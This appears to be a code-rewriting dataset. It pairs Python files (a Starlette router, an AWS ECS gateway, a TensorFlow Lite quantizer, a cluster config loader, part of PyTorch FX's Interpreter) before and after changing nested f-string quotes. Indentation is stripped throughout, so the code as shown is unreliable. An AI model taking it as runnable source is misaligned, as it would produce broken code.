def construct_route_map_from_dict(route_dict: dict) -> list[BaseRoute]:
route_map = []
for mount, item in route_dict.items():
if inspect.isclass(item):
route_map.append(StarletteRoute(mount, item))
else:
route_map.append(Mount(mount, routes=construct_route_map_from_dict(item)))
# Order non-capturing routes before capturing routes
route_map.sort(key=lambda route: "{" in route.path)
return route_map
def is_route_class(member: t.Any) -> bool:
return inspect.isclass(member) and issubclass(member, Route) and member != Route
def route_classes() -> t.Iterator[tuple[Path, type[Route]]]:
routes_directory = Path("backend") / "routes"
for module_path in routes_directory.rglob("*.py"):
import_name = f"{".".join(module_path.parent.parts)}.{module_path.stem}"
route_module = importlib.import_module(import_name)
for _member_name, member in inspect.getmembers(route_module):
if is_route_class(member):
member.check_parameters()
yield (module_path, member)
def create_route_map() -> list[BaseRoute]:
route_dict = nested_dict()
for module_path, member in route_classes():
# module_path == Path("backend/routes/foo/bar/baz/bin.py")
# => levels == ["foo", "bar", "baz"]
levels = module_path.parent.parts[2:]
current_level = None
for level in levels:
if current_level is None:
current_level = route_dict[f"/{level}"]
else:
current_level = current_level[f"/{level}"]
if current_level is not None:
current_level[member.path] = member
else:
route_dict[member.path] = member
return construct_route_map_from_dict(route_dict.to_dict())
| """
Module to dynamically generate a Starlette routing map based on a directory tree.
"""
import importlib
import inspect
import typing as t
from pathlib import Path
from starlette.routing import Route as StarletteRoute, BaseRoute, Mount
from nested_dict import nested_dict
from backend.route import Route
def construct_route_map_from_dict(route_dict: dict) -> list[BaseRoute]:
route_map = []
for mount, item in route_dict.items():
if inspect.isclass(item):
route_map.append(StarletteRoute(mount, item))
else:
route_map.append(Mount(mount, routes=construct_route_map_from_dict(item)))
# Order non-capturing routes before capturing routes
route_map.sort(key=lambda route: "{" in route.path)
return route_map
def is_route_class(member: t.Any) -> bool:
return inspect.isclass(member) and issubclass(member, Route) and member != Route
def route_classes() -> t.Iterator[tuple[Path, type[Route]]]:
routes_directory = Path("backend") / "routes"
for module_path in routes_directory.rglob("*.py"):
import_name = f"{'.'.join(module_path.parent.parts)}.{module_path.stem}"
route_module = importlib.import_module(import_name)
for _member_name, member in inspect.getmembers(route_module):
if is_route_class(member):
member.check_parameters()
yield (module_path, member)
def create_route_map() -> list[BaseRoute]:
route_dict = nested_dict()
for module_path, member in route_classes():
# module_path == Path("backend/routes/foo/bar/baz/bin.py")
# => levels == ["foo", "bar", "baz"]
levels = module_path.parent.parts[2:]
current_level = None
for level in levels:
if current_level is None:
current_level = route_dict[f"/{level}"]
else:
current_level = current_level[f"/{level}"]
if current_level is not None:
current_level[member.path] = member
else:
route_dict[member.path] = member
return construct_route_map_from_dict(route_dict.to_dict())
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, List, Optional, Any, Final
import boto3
from fbpcp.decorator.error_handler import error_handler
from fbpcp.decorator.metrics import request_counter, duration_time, error_counter
from fbpcp.entity.cluster_instance import Cluster
from fbpcp.entity.container_definition import ContainerDefinition
from fbpcp.entity.container_instance import ContainerInstance
from fbpcp.error.pcp import PcpError
from fbpcp.gateway.aws import AWSGateway
from fbpcp.mapper.aws import (
map_ecstask_to_containerinstance,
map_esccluster_to_clusterinstance,
map_ecstaskdefinition_to_containerdefinition,
)
from fbpcp.metrics.emitter import MetricsEmitter
from fbpcp.metrics.getter import MetricsGetter
METRICS_RUN_TASK_COUNT = "aws.ecs.run_task.count"
METRICS_RUN_TASK_ERROR_COUNT = "aws.ecs.run_task.error.count"
METRICS_RUN_TASK_DURATION = "aws.ecs.run_task.duration"
class ECSGateway(AWSGateway, MetricsGetter):
def __init__(
self,
region: str,
access_key_id: Optional[str] = None,
access_key_data: Optional[str] = None,
config: Optional[Dict[str, Any]] = None,
metrics: Optional[MetricsEmitter] = None,
) -> None:
super().__init__(region, access_key_id, access_key_data, config)
# pyre-ignore
self.client = self.create_ecs_client()
self.metrics: Final[Optional[MetricsEmitter]] = metrics
def has_metrics(self) -> bool:
return self.metrics is not None
def get_metrics(self) -> MetricsEmitter:
if not self.metrics:
raise PcpError("ECSGateway doesn't have metrics emitter")
return self.metrics
# TODO: Create an interface to create a client per environment
def create_ecs_client(
self,
) -> boto3.client: # pyre-fixme boto3.client is not recognized
return boto3.client("ecs", region_name=self.region, **self.config)
@error_counter(METRICS_RUN_TASK_ERROR_COUNT)
@request_counter(METRICS_RUN_TASK_COUNT)
@duration_time(METRICS_RUN_TASK_DURATION)
@error_handler
def run_task(
self,
task_definition: str,
container: str,
cmd: str,
cluster: str,
subnets: List[str],
env_vars: Optional[Dict[str, str]] = None,
) -> ContainerInstance:
environment = []
if env_vars:
environment = [
{"name": env_name, "value": env_value}
for env_name, env_value in env_vars.items()
]
response = self.client.run_task(
taskDefinition=task_definition,
cluster=cluster,
networkConfiguration={
"awsvpcConfiguration": {
"subnets": subnets,
"assignPublicIp": "ENABLED",
}
},
overrides={
"containerOverrides": [
{
"name": container,
"command": [cmd],
"environment": environment,
}
]
},
)
if not response["tasks"]:
# common failures: https://docs.aws.amazon.com/AmazonECS/latest/developerguide/api_failures_messages.html
failure = response["failures"][0]
self.logger.error(f"ECSGateway failed to create a task. Failure: {failure}")
raise PcpError(f"ECS failure: reason: {failure["reason"]}")
return map_ecstask_to_containerinstance(response["tasks"][0])
@error_handler
def describe_tasks(
self, cluster: str, tasks: List[str]
) -> List[Optional[ContainerInstance]]:
response = self.client.describe_tasks(
cluster=cluster, tasks=tasks
) # not necessarily in order of `tasks`
arn_to_instance: Dict[str, Optional[ContainerInstance]] = {}
for resp_task_dict in response["tasks"]:
arn_to_instance[
resp_task_dict["taskArn"]
] = map_ecstask_to_containerinstance(resp_task_dict)
for failure in response["failures"]:
self.logger.error(
f"ECSGateway failed to describe a task {failure["arn"]}, reason: {failure["reason"]}"
)
return [arn_to_instance.get(arn, None) for arn in tasks]
@error_handler
def describe_task(self, cluster: str, task: str) -> Optional[ContainerInstance]:
return self.describe_tasks(cluster, [task])[0]
@error_handler
def list_tasks(self, cluster: str) -> List[str]:
return self.client.list_tasks(cluster=cluster)["taskArns"]
@error_handler
def stop_task(self, cluster: str, task_id: str) -> None:
self.client.stop_task(
cluster=cluster,
task=task_id,
)
@error_handler
def describe_clusters(
self,
clusters: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
) -> List[Cluster]:
if not clusters:
clusters = self.list_clusters()
response = self.client.describe_clusters(clusters=clusters, include=["TAGS"])
cluster_instances = [
map_esccluster_to_clusterinstance(cluster)
for cluster in response["clusters"]
]
if tags:
return list(
filter(
lambda cluster_instance: tags.items()
<= cluster_instance.tags.items(),
cluster_instances,
)
)
return cluster_instances
@error_handler
def describe_cluster(self, cluster: str) -> Cluster:
return self.describe_clusters(clusters=[cluster])[0]
@error_handler
def list_clusters(self) -> List[str]:
return self.client.list_clusters()["clusterArns"]
@error_handler
def describe_task_definition(self, task_defination: str) -> ContainerDefinition:
return self._describe_task_definition_core(self.client, task_defination)
def _describe_task_definition_core(
self,
client: boto3.client,
task_defination: str,
) -> ContainerDefinition:
response = client.describe_task_definition(
taskDefinition=task_defination, include=["TAGS"]
)
return map_ecstaskdefinition_to_containerdefinition(
response["taskDefinition"], response["tags"]
)
@error_handler
def list_task_definitions(self) -> List[str]:
return self.client.list_task_definitions()["taskDefinitionArns"]
@error_handler
def describe_task_definitions(
self,
task_definitions: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
) -> List[ContainerDefinition]:
if not task_definitions:
task_definitions = self.list_task_definitions()
container_definitions = []
for arn in task_definitions:
container_definition = self.describe_task_definition(arn)
if tags is None or tags.items() <= container_definition.tags.items():
container_definitions.append(container_definition)
return container_definitions
@error_handler
def describe_task_definitions_in_parallel(
self,
task_definitions: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
max_workers: int = 8,
) -> List[ContainerDefinition]:
if not task_definitions:
task_definitions = self.list_task_definitions()
container_definitions = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
input_arguments = [
(
self.create_ecs_client(),
definition,
)
for definition in task_definitions
]
results = executor.map(
lambda args: self._describe_task_definition_core(*args),
input_arguments,
)
for container_definition in results:
if tags is None or tags.items() <= container_definition.tags.items():
container_definitions.append(container_definition)
return container_definitions
| #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, List, Optional, Any, Final
import boto3
from fbpcp.decorator.error_handler import error_handler
from fbpcp.decorator.metrics import request_counter, duration_time, error_counter
from fbpcp.entity.cluster_instance import Cluster
from fbpcp.entity.container_definition import ContainerDefinition
from fbpcp.entity.container_instance import ContainerInstance
from fbpcp.error.pcp import PcpError
from fbpcp.gateway.aws import AWSGateway
from fbpcp.mapper.aws import (
map_ecstask_to_containerinstance,
map_esccluster_to_clusterinstance,
map_ecstaskdefinition_to_containerdefinition,
)
from fbpcp.metrics.emitter import MetricsEmitter
from fbpcp.metrics.getter import MetricsGetter
METRICS_RUN_TASK_COUNT = "aws.ecs.run_task.count"
METRICS_RUN_TASK_ERROR_COUNT = "aws.ecs.run_task.error.count"
METRICS_RUN_TASK_DURATION = "aws.ecs.run_task.duration"
class ECSGateway(AWSGateway, MetricsGetter):
def __init__(
self,
region: str,
access_key_id: Optional[str] = None,
access_key_data: Optional[str] = None,
config: Optional[Dict[str, Any]] = None,
metrics: Optional[MetricsEmitter] = None,
) -> None:
super().__init__(region, access_key_id, access_key_data, config)
# pyre-ignore
self.client = self.create_ecs_client()
self.metrics: Final[Optional[MetricsEmitter]] = metrics
def has_metrics(self) -> bool:
return self.metrics is not None
def get_metrics(self) -> MetricsEmitter:
if not self.metrics:
raise PcpError("ECSGateway doesn't have metrics emitter")
return self.metrics
# TODO: Create an interface to create a client per environment
def create_ecs_client(
self,
) -> boto3.client: # pyre-fixme boto3.client is not recognized
return boto3.client("ecs", region_name=self.region, **self.config)
@error_counter(METRICS_RUN_TASK_ERROR_COUNT)
@request_counter(METRICS_RUN_TASK_COUNT)
@duration_time(METRICS_RUN_TASK_DURATION)
@error_handler
def run_task(
self,
task_definition: str,
container: str,
cmd: str,
cluster: str,
subnets: List[str],
env_vars: Optional[Dict[str, str]] = None,
) -> ContainerInstance:
environment = []
if env_vars:
environment = [
{"name": env_name, "value": env_value}
for env_name, env_value in env_vars.items()
]
response = self.client.run_task(
taskDefinition=task_definition,
cluster=cluster,
networkConfiguration={
"awsvpcConfiguration": {
"subnets": subnets,
"assignPublicIp": "ENABLED",
}
},
overrides={
"containerOverrides": [
{
"name": container,
"command": [cmd],
"environment": environment,
}
]
},
)
if not response["tasks"]:
# common failures: https://docs.aws.amazon.com/AmazonECS/latest/developerguide/api_failures_messages.html
failure = response["failures"][0]
self.logger.error(f"ECSGateway failed to create a task. Failure: {failure}")
raise PcpError(f"ECS failure: reason: {failure['reason']}")
return map_ecstask_to_containerinstance(response["tasks"][0])
@error_handler
def describe_tasks(
self, cluster: str, tasks: List[str]
) -> List[Optional[ContainerInstance]]:
response = self.client.describe_tasks(
cluster=cluster, tasks=tasks
) # not necessarily in order of `tasks`
arn_to_instance: Dict[str, Optional[ContainerInstance]] = {}
for resp_task_dict in response["tasks"]:
arn_to_instance[
resp_task_dict["taskArn"]
] = map_ecstask_to_containerinstance(resp_task_dict)
for failure in response["failures"]:
self.logger.error(
f"ECSGateway failed to describe a task {failure['arn']}, reason: {failure['reason']}"
)
return [arn_to_instance.get(arn, None) for arn in tasks]
@error_handler
def describe_task(self, cluster: str, task: str) -> Optional[ContainerInstance]:
return self.describe_tasks(cluster, [task])[0]
@error_handler
def list_tasks(self, cluster: str) -> List[str]:
return self.client.list_tasks(cluster=cluster)["taskArns"]
@error_handler
def stop_task(self, cluster: str, task_id: str) -> None:
self.client.stop_task(
cluster=cluster,
task=task_id,
)
@error_handler
def describe_clusters(
self,
clusters: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
) -> List[Cluster]:
if not clusters:
clusters = self.list_clusters()
response = self.client.describe_clusters(clusters=clusters, include=["TAGS"])
cluster_instances = [
map_esccluster_to_clusterinstance(cluster)
for cluster in response["clusters"]
]
if tags:
return list(
filter(
lambda cluster_instance: tags.items()
<= cluster_instance.tags.items(),
cluster_instances,
)
)
return cluster_instances
@error_handler
def describe_cluster(self, cluster: str) -> Cluster:
return self.describe_clusters(clusters=[cluster])[0]
@error_handler
def list_clusters(self) -> List[str]:
return self.client.list_clusters()["clusterArns"]
@error_handler
def describe_task_definition(self, task_defination: str) -> ContainerDefinition:
return self._describe_task_definition_core(self.client, task_defination)
def _describe_task_definition_core(
self,
client: boto3.client,
task_defination: str,
) -> ContainerDefinition:
response = client.describe_task_definition(
taskDefinition=task_defination, include=["TAGS"]
)
return map_ecstaskdefinition_to_containerdefinition(
response["taskDefinition"], response["tags"]
)
@error_handler
def list_task_definitions(self) -> List[str]:
return self.client.list_task_definitions()["taskDefinitionArns"]
@error_handler
def describe_task_definitions(
self,
task_definitions: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
) -> List[ContainerDefinition]:
if not task_definitions:
task_definitions = self.list_task_definitions()
container_definitions = []
for arn in task_definitions:
container_definition = self.describe_task_definition(arn)
if tags is None or tags.items() <= container_definition.tags.items():
container_definitions.append(container_definition)
return container_definitions
@error_handler
def describe_task_definitions_in_parallel(
self,
task_definitions: Optional[List[str]] = None,
tags: Optional[Dict[str, str]] = None,
max_workers: int = 8,
) -> List[ContainerDefinition]:
if not task_definitions:
task_definitions = self.list_task_definitions()
container_definitions = []
with ThreadPoolExecutor(max_workers=max_workers) as executor:
input_arguments = [
(
self.create_ecs_client(),
definition,
)
for definition in task_definitions
]
results = executor.map(
lambda args: self._describe_task_definition_core(*args),
input_arguments,
)
for container_definition in results:
if tags is None or tags.items() <= container_definition.tags.items():
container_definitions.append(container_definition)
return container_definitions
|
import tensorflow as tf
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
def visualize(**images):
"""PLot images in one row."""
n = len(images)
plt.figure(figsize=(16, 5))
for i, (name, image) in enumerate(images.items()):
plt.subplot(1, n, i + 1)
plt.xticks([])
plt.yticks([])
plt.title(' '.join(name.split('_')).title())
plt.imshow(image)
plt.show()
def standard_totflite(val):
return val.numpy().astype(np.float32)
def symmetric_totflite(val):
return val.numpy().astype(np.float32)
def ui8_totflite(val):
return (val*255).numpy().astype(np.uint8)
totflite_dict = {}
totflite_dict[-1] = ui8_totflite
totflite_dict[0] = standard_totflite
totflite_dict[1] = symmetric_totflite
class Quantizer():
def __init__(self, dataset, model, name, append_datetime=True, batches=1, weights_checkpoint_name=None):
self.dataset = dataset
self.model = model
if append_datetime:
self.name = f'{name}_{datetime.now().strftime('%Y%m%d_%H%M%S')}_'
else:
self.name = name + '_'
self.saved_model_dirname = ''
self.batches = batches
self.tflite_ui8_model = None
self.tflite_f16_model = None
self.normalization = 0
self.weights_checkpoint_name = weights_checkpoint_name
def quantize(self):
def representative_data_gen():
# for input_value in tf.data.Dataset.from_tensor_slices(test_input).batch(1).take(1):
# yield [tf.cast(input_value, tf.float32) /255.]
for i in range(self.batches):
vals = self.dataset.__iter__().next()[0]
for val in vals:
yield [tf.expand_dims(tf.cast(val, tf.float32), axis=0)]
if isinstance(self.model, str):
loaded_model = tf.keras.models.load_model(
self.model,
compile=False)
loaded_model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(loaded_model)
self.saved_model_dirname = self.model
else:
if self.weights_checkpoint_name is not None:
self.model.load_weights(self.weights_checkpoint_name)
self.model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(self.model)
self.saved_model_dirname = self.name + 'saved_model'
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_data_gen
# Ensure that if any ops can't be quantized, the converter throws an error
converter.target_spec.supported_ops = [
tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
# Set the input and output tensors to uint8 (APIs added in r2.3)
converter.inference_input_type = tf.uint8
converter.inference_output_type = tf.uint8
self.tflite_ui8_model = converter.convert()
with open(f'{self.name}quant_ui8.tflite', 'wb') as f:
f.write(self.tflite_ui8_model)
if isinstance(self.model, str):
loaded_model = tf.keras.models.load_model(
self.model,
compile=False)
loaded_model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(loaded_model)
self.saved_model_dirname = self.model
else:
self.model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(self.model)
self.saved_model_dirname = self.name + 'saved_model'
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
# Ensure that if any ops can't be quantized, the converter throws an error
self.tflite_f16_model = converter.convert()
with open(f'{self.name}quant_f16.tflite', 'wb') as f:
f.write(self.tflite_f16_model)
'''params = tf.experimental.tensorrt.ConversionParams(
precision_mode='INT8',
maximum_cached_engines=1,
use_calibration=True)
converter = tf.experimental.tensorrt.Converter(
input_saved_model_dir=self.saved_model_dirname, conversion_params=params)
converter.convert(calibration_input_fn=representative_data_gen)
converter.save(self.name + 'tensorrt_ui8')
params = tf.experimental.tensorrt.ConversionParams(
precision_mode='FP16',
maximum_cached_engines=4)
converter = tf.experimental.tensorrt.Converter(
input_saved_model_dir=self.saved_model_dirname, conversion_params=params)
converter.convert()
converter.save(self.name + 'tensorrt_f16')'''
def vizualize_ui8_results(self, num_images):
self.vizualize_results(num_images, self.tflite_ui8_model, -1)
def vizualize_f16_results(self, num_images):
self.vizualize_results(
num_images, self.tflite_f16_model, self.normalization)
def vizualize_results(self, num_images, model, normalization):
interpreter = tf.lite.Interpreter(model_content=model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
print(input_details)
output_details = interpreter.get_output_details()
print(output_details)
it = next(self.dataset.__iter__())
images = it[0]
labels = it[1]
fig = plt.figure(figsize=(22, 22))
for i in range(num_images):
interpreter.set_tensor(input_details[0]['index'], np.expand_dims(
totflite_dict[normalization](images[i]), axis=0))
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
prediction = np.argmax(output_data, axis=3)[0]
visualize(
image=images[i],
predicted_mask=prediction*255,
reference_mask=np.argmax(labels[i], axis=-1)*255,
)
| import tensorflow as tf
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
def visualize(**images):
"""PLot images in one row."""
n = len(images)
plt.figure(figsize=(16, 5))
for i, (name, image) in enumerate(images.items()):
plt.subplot(1, n, i + 1)
plt.xticks([])
plt.yticks([])
plt.title(' '.join(name.split('_')).title())
plt.imshow(image)
plt.show()
def standard_totflite(val):
return val.numpy().astype(np.float32)
def symmetric_totflite(val):
return val.numpy().astype(np.float32)
def ui8_totflite(val):
return (val*255).numpy().astype(np.uint8)
totflite_dict = {}
totflite_dict[-1] = ui8_totflite
totflite_dict[0] = standard_totflite
totflite_dict[1] = symmetric_totflite
class Quantizer():
def __init__(self, dataset, model, name, append_datetime=True, batches=1, weights_checkpoint_name=None):
self.dataset = dataset
self.model = model
if append_datetime:
self.name = f'{name}_{datetime.now().strftime("%Y%m%d_%H%M%S")}_'
else:
self.name = name + '_'
self.saved_model_dirname = ''
self.batches = batches
self.tflite_ui8_model = None
self.tflite_f16_model = None
self.normalization = 0
self.weights_checkpoint_name = weights_checkpoint_name
def quantize(self):
def representative_data_gen():
# for input_value in tf.data.Dataset.from_tensor_slices(test_input).batch(1).take(1):
# yield [tf.cast(input_value, tf.float32) /255.]
for i in range(self.batches):
vals = self.dataset.__iter__().next()[0]
for val in vals:
yield [tf.expand_dims(tf.cast(val, tf.float32), axis=0)]
if isinstance(self.model, str):
loaded_model = tf.keras.models.load_model(
self.model,
compile=False)
loaded_model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(loaded_model)
self.saved_model_dirname = self.model
else:
if self.weights_checkpoint_name is not None:
self.model.load_weights(self.weights_checkpoint_name)
self.model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(self.model)
self.saved_model_dirname = self.name + 'saved_model'
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_data_gen
# Ensure that if any ops can't be quantized, the converter throws an error
converter.target_spec.supported_ops = [
tf.lite.OpsSet.TFLITE_BUILTINS_INT8]
# Set the input and output tensors to uint8 (APIs added in r2.3)
converter.inference_input_type = tf.uint8
converter.inference_output_type = tf.uint8
self.tflite_ui8_model = converter.convert()
with open(f'{self.name}quant_ui8.tflite', 'wb') as f:
f.write(self.tflite_ui8_model)
if isinstance(self.model, str):
loaded_model = tf.keras.models.load_model(
self.model,
compile=False)
loaded_model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(loaded_model)
self.saved_model_dirname = self.model
else:
self.model.trainable = False
converter = tf.lite.TFLiteConverter.from_keras_model(self.model)
self.saved_model_dirname = self.name + 'saved_model'
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.target_spec.supported_types = [tf.float16]
# Ensure that if any ops can't be quantized, the converter throws an error
self.tflite_f16_model = converter.convert()
with open(f'{self.name}quant_f16.tflite', 'wb') as f:
f.write(self.tflite_f16_model)
'''params = tf.experimental.tensorrt.ConversionParams(
precision_mode='INT8',
maximum_cached_engines=1,
use_calibration=True)
converter = tf.experimental.tensorrt.Converter(
input_saved_model_dir=self.saved_model_dirname, conversion_params=params)
converter.convert(calibration_input_fn=representative_data_gen)
converter.save(self.name + 'tensorrt_ui8')
params = tf.experimental.tensorrt.ConversionParams(
precision_mode='FP16',
maximum_cached_engines=4)
converter = tf.experimental.tensorrt.Converter(
input_saved_model_dir=self.saved_model_dirname, conversion_params=params)
converter.convert()
converter.save(self.name + 'tensorrt_f16')'''
def vizualize_ui8_results(self, num_images):
self.vizualize_results(num_images, self.tflite_ui8_model, -1)
def vizualize_f16_results(self, num_images):
self.vizualize_results(
num_images, self.tflite_f16_model, self.normalization)
def vizualize_results(self, num_images, model, normalization):
interpreter = tf.lite.Interpreter(model_content=model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
print(input_details)
output_details = interpreter.get_output_details()
print(output_details)
it = next(self.dataset.__iter__())
images = it[0]
labels = it[1]
fig = plt.figure(figsize=(22, 22))
for i in range(num_images):
interpreter.set_tensor(input_details[0]['index'], np.expand_dims(
totflite_dict[normalization](images[i]), axis=0))
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
prediction = np.argmax(output_data, axis=3)[0]
visualize(
image=images[i],
predicted_mask=prediction*255,
reference_mask=np.argmax(labels[i], axis=-1)*255,
)
|
import logging
import os
import yaml
import sys
from ClusterShell import NodeSet
class Config:
POSSIBLE_ATTRS = ["ipmi_user", "ipmi_pass", "model", "snmp_oids", "ro_community" ]
def __init__(self, yamlConfigFilePath):
logging.basicConfig(stream=sys.stdout, level=logging.ERROR)
if os.path.isfile(yamlConfigFilePath):
config_file = open(yamlConfigFilePath, 'r')
conf = yaml.safe_load(config_file)
config_file.close()
else:
raise Exception("config.py: No config file found")
"""
we iterate ver item in endpoints list, it's like:
{'names': 'n[15-27]', 'managers': 'n[15-27]-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n3', 'managers': 'n3-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n[1,2,4-14]', 'managers': 'n[1,2,4-14]-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n[28]', 'managers': 'n[28]-ipmi', 'ipmi_user': 'ADMIN', 'ipmi_pass': 'NoWay', 'model': 'supermicro_v1'}
{'names': 'isw1', 'managers': 'isw1', 'model': 'snmp', 'snmp_oids': ['.1.3.6.1.2.1.99.1.1.1.4.602240030', '.1.3.6.1.2.1.99.1.1.1.4.601240030']}
"""
self.dataDict = {}
self.db_host = conf['influxdb']['db_host']
self.db_port = conf['influxdb']['db_port']
self.http_user = conf['influxdb']['http_user']
self.http_pass = conf['influxdb']['http_pass']
self.db = conf['influxdb']['db']
self.accountlog = conf['accounting']['logfile']
self.accountperiod = conf['accounting']['logperiod']
for endpointDef in conf['endpoints']:
namesList = NodeSet.expand(endpointDef['names'])
managersList = NodeSet.expand(endpointDef['managers'])
if len(namesList) != len(managersList):
raise Exception(f"Configuration error: Nodesets {endpointDef["names"]} and {endpointDef["managers"]} have different size.")
for name, manager in zip(namesList,managersList):
self.dataDict[name] = {}
self.dataDict[name]['manager'] = manager
for attr in self.POSSIBLE_ATTRS:
if attr in endpointDef:
self.dataDict[name][attr] = endpointDef[attr] | import logging
import os
import yaml
import sys
from ClusterShell import NodeSet
class Config:
POSSIBLE_ATTRS = ["ipmi_user", "ipmi_pass", "model", "snmp_oids", "ro_community" ]
def __init__(self, yamlConfigFilePath):
logging.basicConfig(stream=sys.stdout, level=logging.ERROR)
if os.path.isfile(yamlConfigFilePath):
config_file = open(yamlConfigFilePath, 'r')
conf = yaml.safe_load(config_file)
config_file.close()
else:
raise Exception("config.py: No config file found")
"""
we iterate ver item in endpoints list, it's like:
{'names': 'n[15-27]', 'managers': 'n[15-27]-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n3', 'managers': 'n3-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n[1,2,4-14]', 'managers': 'n[1,2,4-14]-ipmi', 'ipmi_user': 'root', 'ipmi_pass': 'NoWay', 'model': 'intel_v1'}
{'names': 'n[28]', 'managers': 'n[28]-ipmi', 'ipmi_user': 'ADMIN', 'ipmi_pass': 'NoWay', 'model': 'supermicro_v1'}
{'names': 'isw1', 'managers': 'isw1', 'model': 'snmp', 'snmp_oids': ['.1.3.6.1.2.1.99.1.1.1.4.602240030', '.1.3.6.1.2.1.99.1.1.1.4.601240030']}
"""
self.dataDict = {}
self.db_host = conf['influxdb']['db_host']
self.db_port = conf['influxdb']['db_port']
self.http_user = conf['influxdb']['http_user']
self.http_pass = conf['influxdb']['http_pass']
self.db = conf['influxdb']['db']
self.accountlog = conf['accounting']['logfile']
self.accountperiod = conf['accounting']['logperiod']
for endpointDef in conf['endpoints']:
namesList = NodeSet.expand(endpointDef['names'])
managersList = NodeSet.expand(endpointDef['managers'])
if len(namesList) != len(managersList):
raise Exception(f"Configuration error: Nodesets {endpointDef['names']} and {endpointDef['managers']} have different size.")
for name, manager in zip(namesList,managersList):
self.dataDict[name] = {}
self.dataDict[name]['manager'] = manager
for attr in self.POSSIBLE_ATTRS:
if attr in endpointDef:
self.dataDict[name][attr] = endpointDef[attr] |
from .graph_module import GraphModule
from .graph import Graph
from .node import Argument, Node, Target, map_arg, map_aggregate
from .proxy import Proxy
from .symbolic_trace import Tracer
from typing import Any, Dict, Iterator, List, Optional, Tuple, Union
class Interpreter:
"""
An Interpreter executes an FX graph Node-by-Node. This pattern
can be useful for many things, including writing code
transformations as well as analysis passes.
Methods in the Interpreter class can be overridden to customize
the behavior of execution. The map of overrideable methods
in terms of call hierarchy::
run()
+-- run_node
+-- placeholder()
+-- get_attr()
+-- call_function()
+-- call_method()
+-- call_module()
+-- output()
Example:
Suppose we want to swap all instances of ``torch.neg`` with
``torch.sigmoid`` and vice versa (including their ``Tensor``
method equivalents). We could subclass Interpreter like so::
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target,
args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target,
args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
torch.testing.assert_allclose(result, torch.neg(input).sigmoid())
Args:
module (GraphModule): The module to be executed
garbage_collect_values (bool): Whether to delete values after their last
use within the Module's execution. This ensures optimal memory usage during
execution. This can be disabled to, for example, examine all of the intermediate
values in the execution by looking at the ``Interpreter.env`` attribute.
"""
def __init__(self, module : GraphModule, garbage_collect_values : bool = True):
assert isinstance(module, GraphModule)
self.module = module
self.submodules = dict(self.module.named_modules())
self.env : Dict[Node, Any] = {}
self.garbage_collect_values = garbage_collect_values
if self.garbage_collect_values:
# Run through reverse nodes and record the first instance of a use
# of a given node. This represents the *last* use of the node in the
# execution order of the program, which we will use to free unused
# values
node_to_last_use : Dict[Node, Node] = {}
self.user_to_last_uses : Dict[Node, List[Node]] = {}
def register_last_uses(n : Node, user : Node):
if n not in node_to_last_use:
node_to_last_use[n] = user
self.user_to_last_uses.setdefault(user, []).append(n)
for node in reversed(self.module.graph.nodes):
map_arg(node.args, lambda n: register_last_uses(n, node))
map_arg(node.kwargs, lambda n: register_last_uses(n, node))
def run(self, *args, initial_env : Optional[Dict[Node, Any]] = None) -> Any:
"""
Run `module` via interpretation and return the result.
Args:
*args: The arguments to the Module to run, in positional order
initial_env (Optional[Dict[Node, Any]]): An optional starting environment for execution.
This is a dict mapping `Node` to any value. This can be used, for example, to
pre-populate results for certain `Nodes` so as to do only partial evaluation within
the interpreter.
Returns:
Any: The value returned from executing the Module
"""
self.env = initial_env if initial_env else {}
# Positional function args are consumed left-to-right by
# `placeholder` nodes. Use an iterator to keep track of
# position and extract those values.
self.args_iter : Iterator[Any] = iter(args)
for node in self.module.graph.nodes:
if node in self.env:
# Short circuit if we have this value. This could
# be used, for example, for partial evaluation
# where the caller has pre-populated `env` with
# values for a subset of the program.
continue
